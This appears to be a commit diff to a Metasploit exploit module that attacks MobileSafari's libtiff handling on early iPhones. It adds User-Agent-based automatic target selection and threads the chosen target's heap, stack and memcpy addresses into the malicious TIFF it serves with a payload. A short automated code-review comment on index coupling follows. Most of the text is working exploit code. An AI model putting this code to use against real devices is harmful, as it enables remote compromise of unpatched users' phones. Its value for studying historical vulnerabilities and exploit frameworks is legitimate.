Automatic targetting
git-svn-id: file:///home/svn/framework3/trunk@5147 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ad4d4db792
commit
3050615029
|
@ -58,6 +58,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MobileSafari iPhone Mac OS X Automatic',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Automatic' => true
|
||||
}
|
||||
],
|
||||
|
||||
[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
|
@ -77,25 +85,36 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 01 2006'
|
||||
))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
def on_request_uri(cli, req)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
t = target
|
||||
if(target['Automatic'])
|
||||
|
||||
t = self.targets[1]
|
||||
case req.headers['User-Agent']
|
||||
when /iPhone.*420\.1/
|
||||
t = self.targets[2]
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...")
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
|
||||
send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_tiff(code)
|
||||
def generate_tiff(code, targ)
|
||||
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
|
||||
|
||||
|
@ -115,8 +134,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
# return back to the heap location we copied the stack to.
|
||||
#
|
||||
|
||||
dst_ptr = target['Heap']
|
||||
src_ptr = target['Stack']
|
||||
dst_ptr = targ['Heap']
|
||||
src_ptr = targ['Stack']
|
||||
shl_len = 168 + payload.encoded.length
|
||||
|
||||
# Still some wonky characters in here, this doesn't work with alpha/english/etc
|
||||
|
@ -127,7 +146,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# memcpy(r0, r1, r2)
|
||||
patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
|
||||
patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
|
||||
patt[124,4] = [dst_ptr].pack("V") # dst
|
||||
patt[128,4] = [src_ptr].pack("V") # src
|
||||
patt[132,4] = [shl_len].pack("V") # len
|
||||
|
|
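Review bot: The automatic branch in on_request_uri selects its entry with the positional lookups `self.targets[1]` and `self.targets[2]`, which ties it to the order of the 'Targets' array that this same commit shifts by inserting a new first entry. The entry at index 2 is not visible in the hunks shown, so the mapping cannot be checked from this page. A comment above the `case` such as `# indices 1 and 2 must track the order of 'Targets' above` would make the coupling explicit, or the entries could be looked up by name instead of position. In generate_tiff the trailing comment `# memcpy @ 0x3009a1bc` on the `targ['Memcpy']` line names one fixed address, although the value is now read from the passed-in entry and may differ between entries; `# memcpy address taken from the selected target` would stay accurate. Both method bodies continue outside the hunks shown.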